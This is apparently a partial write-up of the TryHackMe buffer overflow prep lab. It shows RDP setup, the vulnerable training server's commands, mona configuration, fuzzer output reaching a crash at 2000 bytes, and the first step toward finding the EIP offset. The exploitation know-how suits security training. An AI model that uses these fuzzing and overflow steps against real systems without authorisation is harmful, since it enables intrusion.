https://tryhackme.com/room/bufferoverflowprep
rdesktop ipaddress -u admin -p password -g 95% -5 -K -r clipboard:PRIMARYCLIPBOARD
Here is some information about the flags:
-g: desktop geometry (WxH[@DPI][+X[+Y]])
-5: use RDP version 5 (default)
-K: keep window manager key bindings
-r clipboard:[off|PRIMARYCLIPBOARD|CLIPBOARD]: enable clipboard
Open Immunity Debugger as Administrator, then press F9 to run the program. On our Kali machine:
┌──(kali㉿kali)-[~]
└─$ **nc ip_address 1337**
Welcome to OSCP Vulnerable Server! Enter HELP for help.
**HELP**
Valid Commands:
HELP
OVERFLOW1 [value]
OVERFLOW2 [value]
OVERFLOW3 [value]
OVERFLOW4 [value]
OVERFLOW5 [value]
OVERFLOW6 [value]
OVERFLOW7 [value]
OVERFLOW8 [value]
OVERFLOW9 [value]
OVERFLOW10 [value]
EXIT
**OVERFLOW1 test**
OVERFLOW1 COMPLETE
Set up mona (install it into Immunity Debugger if it is not preinstalled) and configure its working folder:
!mona config -set workingfolder c:\mona\%p
1-fuzzer.py
On our Kali machine, run the fuzzer to get the crash value:
┌──(kali㉿kali)-[~/OSCP-BoF-Prep]
└─$ python3 fuzzer.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
<...SNIPPET...>
Fuzzing with 2000 bytes
Fuzzing crashed at 2000 bytes
We should expect to see EIP overwritten with 41414141 (the bytes of our "A" buffer)
in the Registers tab.
2-find-offset.py
On our Kali machine, we will then use the following command to generate a cyclic pattern 400 bytes longer than the string that crashed the server.
In our case above the fuzzer crashed at 2000 bytes, so adding 400 gives 2400, which is the length we use here.
Copy the output and place it into the payload variable of the exploit.py script.